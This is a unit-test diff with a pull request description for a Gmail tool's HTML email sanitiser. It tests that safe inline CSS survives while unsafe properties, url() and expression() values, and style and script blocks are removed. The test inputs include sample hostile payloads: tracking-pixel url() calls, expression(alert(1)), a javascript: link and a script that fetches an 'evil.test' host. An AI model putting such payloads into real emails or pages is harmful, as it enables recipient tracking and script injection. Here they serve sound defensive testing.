@@ -53,6 +55,19 @@ def _decoded_text(msg):
         if payload:
             chunks.append(payload.decode("utf-8", errors="replace"))
     return "\n".join(chunks)
+
+
+def _html_part(msg):
+    """Return the decoded text/html part of a MIME message.
+
+    Style assertions must look at the HTML part alone: ``_decoded_text``
+    concatenates every part, and the text/plain alternative is html2text output
+    with the markup already stripped.
+    """
+    for part in msg.walk():
+        if part.get_content_type() == "text/html":
+            return part.get_payload(decode=True).decode("utf-8", errors="replace")
+    raise AssertionError("message has no text/html part")
 
 
 # ============================================================
@@ -102,6 +117,78 @@ class TestCreateEmailMessage:
         rendered = _decoded_text(msg)
         assert "<strong>" in rendered
         assert "<em>" in rendered
+
+    def test_html_body_does_not_warn_about_a_missing_css_sanitizer(self):
+        # bleach emits NoCssSanitizerWarning when `style` is allowed without a
+        # css_sanitizer, and empties every declaration when it does so.
+        with warnings.catch_warnings():
+            warnings.simplefilter("error", NoCssSanitizerWarning)
+            create_email_message('<p style="color:red">Hello</p>', files=None, is_html=True)
+
+    def test_html_body_preserves_safe_inline_styles(self):
+        # The send_email / reply_to_thread / create_draft schemas instruct callers
+        # to style tags inline rather than with <style> blocks, so the
+        # declarations have to survive sanitization.
+        body = '<p style="color:red;font-size:14px">Hello</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "color:red" in rendered
+        assert "font-size:14px" in rendered
+
+    def test_html_body_preserves_table_formatting(self):
+        body = (
+            '<table style="border-collapse:collapse">'
+            '<tr><td style="padding:8px;border:1px solid #ccc">cell</td></tr></table>'
+        )
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "border-collapse:collapse" in rendered
+        assert "padding:8px" in rendered
+        assert "border:1px solid #ccc" in rendered
+
+    @pytest.mark.parametrize(
+        "declaration",
+        [
+            "position:fixed",
+            "z-index:99",
+            "opacity:0",
+            "visibility:hidden",
+            "float:left",
+            "background-image:url(http://tracker.test/x.png)",
+            "list-style-image:url(http://tracker.test/x.png)",
+            "cursor:url(http://tracker.test/x.png),auto",
+        ],
+    )
+    def test_html_body_drops_css_properties_outside_the_allowlist(self, declaration):
+        body = f'<p style="{declaration}">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        prop = declaration.split(":", 1)[0]
+        assert prop not in rendered
+        assert "text" in rendered
+
+    @pytest.mark.parametrize(
+        "declaration",
+        [
+            # url() on an allowlisted property: bleach's CSSSanitizer allowlists
+            # property names only and never inspects the value, so these are
+            # rejected by the value-level guard instead.
+            "background-color:url(http://tracker.test/x.png)",
+            "font-family:url(http://tracker.test/x.png)",
+            "width:expression(alert(1))",
+            "color:expression(alert(1))",
+        ],
+    )
+    def test_html_body_drops_unsafe_values_on_allowlisted_properties(self, declaration):
+        body = f'<p style="{declaration}">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "url(" not in rendered
+        assert "expression(" not in rendered
+        assert "text" in rendered
+
+    def test_html_body_keeps_safe_declarations_alongside_rejected_ones(self):
+        body = '<p style="color:blue;position:absolute;padding:4px">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "color:blue" in rendered
+        assert "padding:4px" in rendered
+        assert "position" not in rendered
 
     def test_html_body_includes_plain_text_alternative(self):
         body = "<p>HTML body</p>"

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -105,6 +105,38 @@ class TestCreateEmailMessage:
         assert "<script>" not in rendered
         assert "Safe" in rendered
 
+    @pytest.mark.parametrize(
+        "body",
+        [
+            "<style>@keyframes pulse{0%{color:red}}</style><p>Hi</p>",
+            "<STYLE type='text/css'>.a{color:red}</STYLE><p>Hi</p>",
+            "<script>fetch('http://evil.test')</script><p>Hi</p>",
+            "<p>Hi</p><style>.a{color:red}</style>",
+        ],
+    )
+    def test_html_body_discards_raw_text_element_contents(self, body):
+        # bleach.clean(strip=True) drops the tag but keeps its text, so a <style>
+        # block would otherwise be printed in the email as literal CSS.
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "keyframes" not in rendered
+        assert "color:red" not in rendered
+        assert "evil.test" not in rendered
+        assert "Hi" in rendered
+
+    def test_html_body_discards_an_unterminated_style_block(self):
+        # A real parser treats everything after an unclosed <style> as CSS, so
+        # the remainder is dropped rather than emitted as text.
+        body = "<p>before</p><style>.a{color:red}"
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "color:red" not in rendered
+
+    def test_html_body_keeps_content_either_side_of_a_style_block(self):
+        body = "<p>before</p><style>.a{color:red}</style><p>after</p>"
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert "before" in rendered
+        assert "after" in rendered
+        assert "color:red" not in rendered
+
     def test_html_body_strips_disallowed_protocol(self):
         body = '<a href="javascript:alert(1)">click</a>'
         msg = create_email_message(body, files=None, is_html=True)


### PR DESCRIPTION
## Summary
- configure a `CSSSanitizer` so inline `style` declarations survive instead of being silently emptied, which also clears the `NoCssSanitizerWarning`
- allow only visual-formatting CSS properties, and reject `url()`, `expression()` and the like by value as well as by property name
- clear bleach's default SVG property allowlist, which bypassed the policy
- strip `<style>` and `<script>` with their contents, rather than printing them into the email body as text
- allow `box-shadow` and `text-shadow`, and document why `animation` and `transition` cannot work in inline styles
- declare `bcc` on `send_email` and `reply_to_thread`, and the optional reply `subject`, all read in code but undeclared
- pin the SDK to 2.0.1 and resolve optional inputs with `.get()` instead of key presence
- add live integration tests for HTML sanitisation, which the integration test file had no coverage of

## Images

## Before
<img width="590" height="405" alt="image" src="https://github.com/user-attachments/assets/0998e808-45e8-4d64-aa72-5045893b10be" />

## After
<img width="505" height="1074" alt="image" src="https://github.com/user-attachments/assets/5696ebd5-02c7-4a71-b7c6-487a3b8f14d2" />

## Testing
- `pytest gmail/` — 147 passed, 0 warnings (110 passed with 7 warnings on master)
- `hiveup validate --base-ref origin/master gmail` — 11 checks pass, 2 warn
- `pytest gmail/tests/test_gmail_integration.py -m "integration and destructive"` — 2 new live tests pass, creating an HTML draft, asserting on the MIME Gmail stored, and deleting it
- config-code sync warnings: 27 down to 9

Closes #434
